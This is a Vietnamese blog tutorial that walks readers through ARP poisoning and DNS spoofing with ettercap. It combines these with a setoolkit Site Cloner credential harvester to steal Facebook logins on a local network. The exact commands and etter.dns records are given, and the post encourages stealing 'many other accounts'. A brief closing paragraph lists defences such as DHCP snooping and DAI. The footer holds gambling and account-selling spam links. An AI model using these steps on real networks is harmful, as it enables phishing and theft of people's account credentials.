• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

DNS Spoofing – Hack Facebook

AnonyViet by AnonyViet
15/12/2015 - Updated on 16/12/2020
in Facebook, Kali Linux / Parrot
Reading Time: 6 mins read
A A
0

Mình xin nói sơ qua về DNS – Domain Name System – Hệ thống phân giải tên miền.

Khi bạn vào web browser gõ facebook.com thì hệ thống DNS sẽ phân giải cho bạn sang địa chỉ IP để bạn có thể giao tiếp, truyền tải dữ liệu trên mạng.

Các bài viết liên quan

Hướng dẫn cài đặt Facebook Lite trên Iphone siêu nhẹ

Cách tải Facebook Lite mới nhất cho Iphone 2022

10/08/2022
Hướng dẫn khai thác lỗi SQL Injection cơ bản 40

Hướng dẫn khai thác lỗi SQL Injection cơ bản

29/07/2022
Cách cấu hình Ngrok để NAT Port trên Kali Linux 41

Cách cấu hình Ngrok để NAT Port trên Kali Linux

26/07/2022
Cách Hack mật khẩu Windows 10/11 42

Cách Hack mật khẩu Windows 10/11

21/07/2022

Bài này mình sẽ chia làm 2 phần:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Phần 2: Sử dụng Setoolkit và Ettercap để thực hiện đánh cắp tài khoản facebook.

Thực hiện:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Trước tiên, mình sẽ ping facebook.com xem thử địa chỉ IP tương ứng với tên miền facebook.com là gì

 photo facebook_zpsf1b7f07c.jpg

Tiếp đến, vào Kali Linux thực hiện Enable IP Forwarding.

#echo 1 > /proc/sys/net/ipv4/ip_forward

 photo ipforwarding_zps9e90c910.jpg

Tiếp theo sửa file etter.dns.

Sử dụng câu lệnh locate etter.dns xem hiện tại nó đang ở đâu. Xong thì tiến hành vào thêm các record sau:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

Với địa chỉ 192.168.0.109 là IP máy Attacker.

 photo etterdns_zps6db36b10.jpg

Note: Có thể nằm ở địa chỉ /usr/local/share/ettercap/etter.dns với các phiên bản Backtrack 5

Xong thì lưu lại và thoát :wq

 photo facebook2_zpscdfe6288.jpg

Thực hiện dns spoofing bằng câu lệnh

#ettercap -T -q -M arp:remote -P dns_spoof //

 photo ettercap_zpsac23a3f7.jpg

Sau đó vào máy client, cấp lại địa chỉ bằng câu lệnh >ipconfig /renew

 photo ettercap3_zps6c7aa75f.jpg

Bây giờ lên PC client truy cập vào facebook.com bạn sẽ thấy nó vẫn truy cập bình thường. Nhưng khi tiến hành ping đến facebook.com thì IP trả lời lại là 192.168.0.109 – IP máy Attacker.

 photo pingfacebook2_zps52486770.jpg

OK. Vậy là bạn đã thành công trong việc lái dữ liệu qua máy bạn, giờ chúng ta sẽ tiến hành đánh cắp tài khoản Facebook.

Phần 2: Sử dụng setoolkit và ettercap để thực hiện đánh cắp tài khoản facebook.

Công cụ sử dụng:

setoolkit: clone website, capture username/password

ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (nghe lén).

Video demo: Youtube

Hướng dẫn bằng hình ảnh

Bật setoolkit

#/usr/share/set/setoolkit

DNS Spoofing - Hack Facebook 22

Đồng ý điều khoản sử dụng Bấm y -> Enter

 photo setoolkit2_zps3d0fa4a2.jpg

Chọn 1) Social-Engineering Attacks

 photo setoolkit3_zps2970c553.jpg

Chọn 2) Website Attack Ventors

DNS Spoofing - Hack Facebook 23

Chọn 3) Credential Harvester Attack Method

DNS Spoofing - Hack Facebook 24

Chọn 2) Site Cloner

DNS Spoofing - Hack Facebook 25

Đánh địa chỉ IP của Attacker: 192.168.0.109

DNS Spoofing - Hack Facebook 26

Đánh đường dẫn muốn clone website: https://www.facebook.com

DNS Spoofing - Hack Facebook 27

Xong thì bật Terminal khác, đánh ettercap -G để bật cấu hình ettercap bằng giao diện

Chọn Sniff-> Unified sniffing

DNS Spoofing - Hack Facebook 28

Chọn cổng để nghe lén: eth0

DNS Spoofing - Hack Facebook 29

Chọn Hosts-> Scan for hosts

Host-> Hosts List

DNS Spoofing - Hack Facebook 30

Chọn 2 địa chỉ để tiến hành nghe lén

DNS Spoofing - Hack Facebook 31

Thực hiện ARP possoning (ARP spoofing)

DNS Spoofing - Hack Facebook 32

Click chọn Sniff remote connections.

DNS Spoofing - Hack Facebook 33

Vào /etc/ettercap/etter.dns thêm vào 2 dòng:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

DNS Spoofing - Hack Facebook 34

Vào Plugins-> Manage the plugins

DNS Spoofing - Hack Facebook 35

Click vào dns_spoof để bật tính năng này

DNS Spoofing - Hack Facebook 36

Start sniffing

DNS Spoofing - Hack Facebook 37

Tại máy client mở web browser vào facebook.com, điền username/password

DNS Spoofing - Hack Facebook 38

setoolkit sẽ bắt được username/password này

DNS Spoofing - Hack Facebook 39

Thông tin username/password hiện dưới dạng clear-text như trên, vậy là bạn đã có tài khoản facebook của client.

Cập nhật ngày 15/9/2015:

Ở phiên bản mới Kali 2.0, khi clone site về sẽ được lưu trong đường dẫn /var/www/ bạn tiến hành copy những file này vào đường dẫn /var/www/html sau đó tiến hành bình thường:

Note: nhớ change quyền để đọc và viết cho các file này:

#cd /var/www/html
#chmod 777 ./*

gồm 3 file là:
– index.html : giao diện của facebook.com
– post.php: hàm để lấy username/password khi bạn nhập vào và lưu ở file haverster_*.txt
– harvester_ngày_giờ.txt : lưu thông tin thu được.

 photo clone1.png

Bằng cách tương tự các bạn có thể đánh cắp nhiều tài khoản khác.

Cách phòng chống DNS Spoofing:

Ngoài 2 cách ở bài ARP spoofing là triển khai port-security và DAI các bạn nên triển khai thêm DHCP snooping để ngăn chặn cấp DHCP giả mạo.

P/s: Như các bạn đã thấy, nếu attacker đã vào được trong mạng nội bộ của chúng ta mà có ý đồ đen tối thì có nhiều công cụ để khai khác thông tin của công ty mình. Như vậy, nếu nhân viên nào có ý đồ phá hoại công ty thì cũng khá vất vả để điều tra.

Nhân tiện đây, bạn nào có sử dụng công cụ hay chương trình giám sát nào bổ ích thì chia sẻ cho anh em biết với nhé.

Thân,

Tags: dnsFacebookhackkali linux
Previous Post

Bruter Facebook password cracking tool

Next Post

[Facebook] TUT Rip mới nhất

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Cách tạo 5 tài khoản cá nhân phụ trên Facebook 43
Facebook

Cách tạo 5 tài khoản cá nhân phụ trên Facebook

19/07/2022
tăng follow fb
Facebook

Cách tăng follow Facebook miễn phí và nhanh nhất

27/06/2022 - Updated on 28/06/2022
lấy lại tên Facebook khi bị đổi tên
Facebook

Cách lấy lại tên Facebook khi người khác đổi tên

17/06/2022 - Updated on 20/06/2022
mo nut chia se bai viet tren facebook
Facebook

Bật nút Chia sẻ bài viết Facebook trên trang cá nhân

04/06/2022
share code 2fa.live
Facebook

Share Code lấy mã 2FA giống 2fa.live

22/04/2022 - Updated on 23/04/2022
Tại sao Hacker thích dùng Kali Linux?
Kali Linux / Parrot

Tại sao Hacker thích dùng Kali Linux?

29/03/2022
Next Post
[Facebook] TUT Rip mới nhất

[Facebook] TUT Rip mới nhất

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

Một chút Writeup về Skynet 44

Một chút Writeup về Skynet

12/08/2022
Cách quay video hoạt động Terminal trên Linux bằng script 45

Cách quay video hoạt động Terminal trên Linux bằng script

12/08/2022
cài virtualmin vps orcale ubuntu

Cách cài đặt Virtualmin trên Ubuntu bằng VPS Orcale

11/08/2022
Tất tần tật về Windows Terminal 46

Tất tần tật về Windows Terminal

11/08/2022
Hướng dẫn cài đặt Facebook Lite trên Iphone siêu nhẹ

Cách tải Facebook Lite mới nhất cho Iphone 2022

10/08/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • Hevin trong Cách hacker Bypass AntiVirus trên máy tính của bạn
  • AnonyViet trong Cách cài đặt Virtualmin trên Ubuntu bằng VPS Orcale
  • duynam trong Hướng dẫn tạo VPS 4 Core 24 GB RAM của Oracle miễn phí
  • Min trong Cách cài đặt Virtualmin trên Ubuntu bằng VPS Orcale
  • cute ^^! trong Cách nâng cấp GSuite Legacy lên Google Workspace Starter miễn phí

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery tải tdtc stackoverflow tool tài xỉu 68 club 68 game bài iwinclub.link mua nick facebook

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery tải tdtc stackoverflow tool tài xỉu 68 club 68 game bài iwinclub.link mua nick facebook

pixel